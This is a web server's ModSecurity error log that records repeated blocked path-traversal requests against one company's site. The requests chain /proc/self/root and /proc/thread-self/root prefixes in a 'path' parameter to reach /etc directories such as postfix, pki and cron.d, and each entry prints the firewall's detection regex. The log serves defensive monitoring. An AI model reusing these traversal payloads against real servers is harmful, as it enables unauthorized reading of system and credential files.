[Tue Mar 17 09:19:28.038935 2026] [:error] [pid 2305:tid 140411574073088] [client 74.7.241.46:40490] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablG0AQohV2v-7oj5HH5yQAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:19:29.364728 2026] [:error] [pid 1210:tid 140411616036608] [client 74.7.241.46:34566] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablG0VKJy4A1bGlmj9BT0QAAAk8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:19:30.558289 2026] [:error] [pid 7000:tid 140411641214720] [client 74.7.241.46:34572] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablG0hePVOt35XCGZP8uKgAAA4w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:19:31.842780 2026] [:error] [pid 11469:tid 140411708356352] [client 74.7.241.46:34586] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablG05DEJR9VXonE_-1NpAAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:19:32.111138 2026] [:error] [pid 11469:tid 140411599251200] [client 74.7.241.46:34586] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablG1JDEJR9VXonE_-1NpQAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:19:36.712038 2026] [:error] [pid 1210:tid 140411624429312] [client 74.7.241.46:34598] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablG2FKJy4A1bGlmj9BT2AAAAk4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:19:39.376007 2026] [:error] [pid 7000:tid 140411674785536] [client 74.7.241.46:34600] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablG2xePVOt35XCGZP8uMgAAA4g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:19:40.772638 2026] [:error] [pid 11469:tid 140411599251200] [client 74.7.241.46:39846] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablG3JDEJR9VXonE_-1NrQAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:19:43.335292 2026] [:error] [pid 7437:tid 140411691570944] [client 74.7.241.46:39862] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablG3weiSKl8TjouI-YBDwAAA8Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:19:44.695355 2026] [:error] [pid 7000:tid 140411582465792] [client 74.7.241.46:39866] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablG4BePVOt35XCGZP8uMwAAA5M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:19:47.652517 2026] [:error] [pid 2473:tid 140411725141760] [client 74.7.241.46:39868] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablG46BJNF7axNlVR0X7VwAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:19:50.263124 2026] [:error] [pid 1210:tid 140411733534464] [client 74.7.241.46:34458] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablG5lKJy4A1bGlmj9BT5gAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:19:53.774487 2026] [:error] [pid 1016:tid 140411699963648] [client 74.7.241.46:34470] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablG55qmL8PQht4WJFlGXAAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:19:56.067280 2026] [:error] [pid 11293:tid 140411741927168] [client 74.7.243.203:37268] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablG7NCmCSWTlPouqorKEgAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:19:56.247515 2026] [:error] [pid 7000:tid 140411674785536] [client 74.7.241.46:34486] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablG7BePVOt35XCGZP8uPwAAA4g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:19:57.703511 2026] [:error] [pid 1961:tid 140411632822016] [client 74.7.241.46:34494] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablG7XRXaaWotPICgYskFgAAA00"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:19:59.003519 2026] [:error] [pid 2305:tid 140411741927168] [client 74.7.241.46:43552] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablG7wQohV2v-7oj5HH56wAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:20:03.430458 2026] [:error] [pid 11293:tid 140411540502272] [client 74.7.241.46:43556] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablG8NCmCSWTlPouqorKFQAAANg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:20:07.751601 2026] [:error] [pid 1210:tid 140411607643904] [client 74.7.241.46:43568] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablG91KJy4A1bGlmj9BT-AAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:20:10.390709 2026] [:error] [pid 2305:tid 140411741927168] [client 74.7.241.46:48760] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablG-QQohV2v-7oj5HH59AAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:20:16.513515 2026] [:error] [pid 7000:tid 140411632822016] [client 74.7.241.46:48770] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablHABePVOt35XCGZP8uUQAAA40"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
